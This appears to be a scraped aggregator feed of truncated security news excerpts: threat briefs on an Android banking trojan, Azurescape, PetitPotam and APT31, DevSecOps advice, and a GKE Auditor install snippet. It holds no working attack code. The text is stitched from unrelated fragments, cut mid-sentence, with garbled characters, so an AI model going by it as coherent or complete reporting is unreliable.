]]> 2021-10-06T19:06:00+00:00 https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server www.secnews.physaphae.fr/article.php?IdArticle=3479896 False Malware,Tool,Threat APT 32,Uber None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence S.O.V.A. – A New Android Banking Trojan with Fowl Intentions (published: September 10, 2021) ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap. Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation. MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (published: September 9, 2021) Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud. Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl]]> 2021-09-14T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-azurescape-cloud-threat-mshtml-0-day-in-the-wild-confluence-cloud-hacked-to-mine-monero-and-more www.secnews.physaphae.fr/article.php?IdArticle=3369753 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Guideline Uber,APT 15,APT 41 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Windows “PetitPotam” Network Attack – How to Protect Against It (published: July 21, 2021) Microsoft has released mitigations for a new Windows vulnerability called PetitPotam. Security researcher, Gillesl Lionel, created a proof-of-concept script that abuses Microsoft’s NT Lan Manager (NTLM) protocol called MS-EFSRPC (encrypting file system remote protocol). PetitPotam can only work if certain system functions that are enabled if the following conditions are met: NTLM authentication is enabled on domain, active directory certificate services (AD CS) is being used, certificate authority web enrollment or certificate enrollment we service are enabled. Exploitation can result in a NTLM relay attack, which is a type of man-in-the-middle attack. Analyst Comment: Microsoft has provided mitigation steps to this attack which includes disabling NTLM on a potentially affected domain, in addition to others. Tags: Vulnerability, Microsoft, PetitPotam, Man-in-the-middle APT31 Modus Operandi Attack Campaign Targeting France (published: July 21, 2021) The French cybersecurity watchdog, ANSSII issued an alert via France computer emergency response team (CERT) discussing attacks targeting multiple French entities. The China-sponsored, advanced persistent threat (APT) group APT31 (Judgment Panda, Zirconium) has been attributed to this ongoing activity. The group was observed using “a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.” Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Resource Hijacking - T1496 Tags: APT, APT31, Judgment Panda, Zirconium, Home routers StrongPity APT Group Deploys Android Malware for the First Time (published: July 21, 2021) Trend Micro researchers conducted analysis on a malicious APK sample shared on Twitter by MalwareHunterTeam. The shared sample was discussed as being a trojanized version of an Android app offered on the authentic Syrian E-Gov website, potentially via a watering-hole attack. Researchers took this information and pivoted further to analyze the backdoor functionality of the trojanized app (which is no longer being distributed on the official Syrian E-Gov website). Additional samples were identified to be contacting URLs that are identical to or following previous r]]> 2021-07-27T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt31-targeting-french-home-routers-multiple-microsoft-vulnerabilities-strongpity-deploys-android-malware-and-more www.secnews.physaphae.fr/article.php?IdArticle=3140285 False Malware,Tool,Vulnerability,Threat APT 31,Uber None CVE Liste - Common Vulnerability Exposure 2021-06-16T22:15:07+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32690 www.secnews.physaphae.fr/article.php?IdArticle=2940684 False Tool,Vulnerability Uber None Veracode - Application Security Research, News, and Education Blog You???ve heard of DevOps. And by now, you???ve probably also heard of DevSecOps, which extends DevOps principles into the realm of security. In DevSecOps, security breaks out of its ???silo??? and becomes a core part of the DevOps lifecycle. That, at least, is the theory behind DevSecOps. What???s often more challenging for developers to figure out is how to apply DevSecOps in practice. Which tools and processes actually operationalize DevSecOps? Until you can answer that question, DevSecOps will be just another buzzword. To help bridge the gap between theory and practice, let???s walk through what DevSecOps means from a practical perspective, and how to go about embedding it into your development workflows. DevSecOps, defined If you???re familiar with DevOps (which encourages collaboration between developers and IT operations engineers in order to speed application delivery), then the meaning of DevSecOps is easy enough to understand. DevSecOps adds security operations teams into the equation so that they can collaborate seamlessly with developers and IT engineers. DevSecOps places a DevOps spin on basic security concepts. Just as DevOps encourages continuous delivery, DevSecOps is all about continuous security ??? meaning the constant and holistic management of security across the software development lifecycle. Similarly, DevSecOps encourages continuous improvement in the realm of security ??? meaning that no matter how secure you believe your environment is, you should always be looking for ways to improve your security posture even further. DevSecOps in practice These are all great ideas to talk about, and it???s easy to see why they are valuable. Security postures are indeed stronger when developers, IT engineers, and security engineers work together, rather than working in isolation. It???s much easier to optimize security when developers prioritize security with every line of code they write, and when IT engineers think about the security implications of every deployment they push out, rather than viewing security as something that someone else will handle down the line. The big question for teams that want to embrace DevSecOps, though, is how to go about putting these ideas into practice. That???s where things can get tougher. There is no simple methodology that allows you to ???do??? DevSecOps. Nor is there a specific tool that you can deploy or a particular role that you can add to your team. Instead, operationalizing DevSecOps means building holistic combinations of processes and tools that make it possible to integrate security into DevOps workflows. While the best approach to this will vary from team to team, the following are some general best practices for implementing DevSecOps. Scanning early and often One basic step toward implementing DevSecOps is to ensure that you perform security tests and audits at the beginning of the software delivery pipeline. You don???t want to wait until code is written and built to start testing it for flaws (and you certainly don???t want to let it get into production before testing it). Instead, you should be scanning code as it is written, by integrating security tooling directly into your IDEs if possible. Importantly, security scanning should continue as code ???flows??? down the pipeline. You should scan your test builds and application release candidates before deployment. Security monitoring and auditing should also continue once code is in production. Automation Automation is a founding principle of DevOps, and it???s just as important to DevSecOps. Automation not only makes processes faster and more efficient, but also helps reduce friction between the different stakeholders in DevSecOps]]> 2021-04-19T09:05:28+00:00 https://www.veracode.com/blog/secure-development/devsecops-practice-how-embed-security-devops-lifecycle www.secnews.physaphae.fr/article.php?IdArticle=2665989 False Tool Uber 3.0000000000000000 TechRepublic - Security News US 2021-03-03T17:51:31+00:00 https://www.techrepublic.com/article/how-to-quickly-validate-your-kubernetes-configuration-files/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=2429088 False Tool Uber None CVE Liste - Common Vulnerability Exposure 2021-02-05T22:15:12+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21303 www.secnews.physaphae.fr/article.php?IdArticle=2302251 False Tool Uber None Darknet - The Darkside - Site de news Américain GKE Auditor is a Java-based tool to detect Google Kubernetes Engine misconfigurations, it aims to help security and development teams streamline the configuration process and save time looking for generic bugs and vulnerabilities. The tool consists of individual modules called Detectors, each scanning for a specific vulnerability. Installing and Using GKE Auditor to Detect Google Kubernetes Engine Misconfigurations Installation git clone https://github.com/google/gke-auditor cd ./gke-auditor/ ./build.sh Usage The tool has to be built by running the build.sh script first. Read the rest of GKE Auditor – Detect Google Kubernetes Engine Misconfigurations now! Only available at Darknet. ]]> 2021-01-01T10:59:21+00:00 https://www.darknet.org.uk/2021/01/gke-auditor-detect-google-kubernetes-engine-misconfigurations/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed www.secnews.physaphae.fr/article.php?IdArticle=2139015 False Tool Uber None Veracode - Application Security Research, News, and Education Blog Veracode???s Chris Wysopal and Chris Eng joined Enterprise Strategy Group (ESG) Senior Analyst Dave Gruber and award-winning security writer and host of the Smashing Security podcast, Graham Cluley, at Black Hat USA to unveil the findings from a new ESG research report, Modern Application Development Security. The research is based on a survey of nearly 400 developers and security professionals, which explored the dynamic between the roles, their trigger points, the extent to which security teams understand modern development, and the buying intentions of application security (AppSec) teams. As the presenters went through the data, it led to a larger discussion about AppSec best practices and what steps organizations can take to mature their programs. Here are the best practices laid out during the presentation as an easy-to-follow checklist as well as supporting data from the ESG report. Application security controls are highly integrated into the CI/CD toolchain. In the ESG survey, 43 percent of organizations agreed that DevOps integration is most important to improving AppSec programs, but only 56 percent of respondents answered that they use a highly integrated set of security controls throughout their DevOps process. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment. Application security best practices are formally documented. In order to have a successful AppSec program, everyone needs to be on the same page regarding best practices. The CISO should help facilitate the formal documentation of AppSec best practices. Developers and security professionals can reference the list and use it to guide their decisions. Application security training is included as part of the ongoing development security training program. Developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities. Most developers don???t receive secure code training courses in college, so it is up to organizations to offer security training. But according to the survey, more than 20 percent of organizations only provide training when developers join the team. Developers should have multiple, at-leisure training opportunities throughout the year, like virtual or hands-on programs ??? such as Veracode Security Labs. Chris Wysopal pointed out the importance of human touchpoints as part of ongoing developer training. If someone is checking in on developers to make sure they???re completing their training, they???ll likely take it more seriously. Consider a security champions program. The security champions are developers who have an interest in learning about security. If you have at least one security champion on every scrum team, that person can help ensure that their peers are up to speed on the latest security training and best practices. Ongoing developer security training includes formal training programs, and a high percentage of developers participate. At-leisure security training is a great way for developers to learn on their own time. But it is also important to implement formal security training with a set completion date and a skills assessment. Without formal security training, developers may not develop the skills they need to write secure code and remediate vulnerabilities. This could lead to slower and more expensive deployments because of rework or vulnerable code being pushed to production. Accordin]]> 2020-10-29T13:04:48+00:00 https://www.veracode.com/blog/intro-appsec/software-security-checklist-based-most-effective-appsec-programs www.secnews.physaphae.fr/article.php?IdArticle=2103305 False Tool,Vulnerability,Guideline Uber None TechRepublic - Security News US 2020-07-15T14:17:38+00:00 https://www.techrepublic.com/article/how-to-create-a-kubernetes-replicaset/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1805910 False Tool Uber None Security Affairs - Blog Secu 2020-06-11T18:09:02+00:00 https://securityaffairs.co/wordpress/104618/cyber-crime/cryptomining-campaign-targets-kubernetes-kubeflow.html?utm_source=rss&utm_medium=rss&utm_campaign=cryptomining-campaign-targets-kubernetes-kubeflow www.secnews.physaphae.fr/article.php?IdArticle=1762407 False Tool Uber None TechRepublic - Security News US 2020-04-10T14:47:27+00:00 https://www.techrepublic.com/article/how-to-use-port-forwarding-with-containers-deployed-in-a-kubernetes-cluster/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1646793 False Tool Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2019 Cyber Security Report published by the International Information System Security Certification Consortium, 93 percent of organizations say they are concerned about cloud security and 28 percent admit to having experienced cloud security incidents during the past year. The reality is, most companies lack the specialized knowledge and skills needed to provide that customer data stored in the cloud is protected Cloud service providers (CSPs) do provide extra security layers, such as automating threat detection, with the intent of making their customers feel more confident in the security of the cloud. However, the number of cloud breaches that are being reported shows that CSPs and organizations alike continue to struggle with cloud security. Much of this is due to a lack of unified visibility not just in the cloud, but across an organization’s entire network, siloed teams and technologies, lack of threat intelligence, and partnerships with third-parties whose security controls are not up to snuff. To address these challenges, many in the industry are advocating for organizations to simplify and unify their security approach, i.e. bring as many controls as possible into a single solution in order to break down the silos between security teams and technologies and to give greater visibility across the organization. We at AT&T Cybersecurity help organizations to accomplish this with our Unified Security Management™ (USM) Anywhere platform.  Of course, the effectiveness of any security solution is largely determined by the threat intelligence underpinning it. In any environment, we need to identify the common tactics, techniques, and procedures (TTPs) adversaries are using in their attacks. Below, we provide an overview of the latest threat intelligence from Alien Labs™ for Google Cloud Platform (GCP), which helps security practitioners to discover issues in their cloud workloads and detect adversaries exploiting attack vectors commonly seen in cloud environments. Google Cloud Platform integration in USM This summer, AT&T Cybersecurity launched the USM Anywhere™ integration with GCP. Through the USM Anywhere Alien App for GCP, USM can now consume all logging information managed by the Stackdriver utility in a configurable and intuitive way. Google Cloud Platform logs are provided through three major channels: Audit Logs. Record all events impacting objects within the environment. These logs are used to monitor any cloud assets, presenting a solid baseline for security detection. VPC Flow Logs. Half way between resource monitoring and cloud infrastructure security, these logs are the delights of NIDS enthusiasts. Firewall Logs. These help with auditing firewall rules events, and they are useful in detecting risky open ports and other configuration issues. In USM, these channels are processed by different plugins, which extract pieces of intelligence and map them to variables that are easy to steer into orchestration rules. The correlation engine allows for the combination of detections from different channels into a single orchestration rule, scaling GCP security to a new level. To prevent an intrusion from being recorded or triggering a notification, adversaries may try to disable audit logging once they get the necessary permissions. To protect against that, the product has out of the box correlation rules to generate an alert if any of the logging features is disabled. ]]> 2019-12-11T14:00:00+00:00 https://feeds.feedblitz.com/~/612840892/0/alienvault-blogs~Google-Cloud-Platform-security-monitoring-with-USM-Anywhere%e2%84%a2 www.secnews.physaphae.fr/article.php?IdArticle=1493780 False Tool,Threat,Guideline Uber None TechRepublic - Security News US 2019-09-26T21:03:08+00:00 https://www.techrepublic.com/article/how-to-deploy-the-kubernetes-webui-with-microk8s/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1363845 False Tool Uber None ZD Net - Magazine Info 2019-06-26T20:51:02+00:00 https://www.zdnet.com/article/kubernetes-cli-tool-security-flaw-lets-attackers-run-code-on-host-machine/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1175495 False Tool,Guideline Uber None IT Security Guru - Blog Sécurité 2019-05-21T14:40:05+00:00 https://www.itsecurityguru.org/2019/05/21/gigamon-launches-new-tool-to-shine-light-on-digital-apps-within-the-enterprise/ www.secnews.physaphae.fr/article.php?IdArticle=1118107 False Tool Uber None CSO - CSO Daily Dashboard 2018-12-27T03:00:00+00:00 https://www.csoonline.com/article/3329860/hacking/the-most-interesting-and-important-hacks-of-2018.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=966793 False Hack,Tool Uber None Wired Threat Level - Security News 2018-10-25T17:23:01+00:00 https://www.wired.com/story/algorithms-netflix-tool-for-justice www.secnews.physaphae.fr/article.php?IdArticle=862865 False Tool Uber None Wired Threat Level - Security News 2018-10-18T19:03:05+00:00 https://www.wired.com/story/an-app-built-for-hurricane-harvey-is-now-saving-lives-in-florida www.secnews.physaphae.fr/article.php?IdArticle=853941 False Tool,Guideline Uber None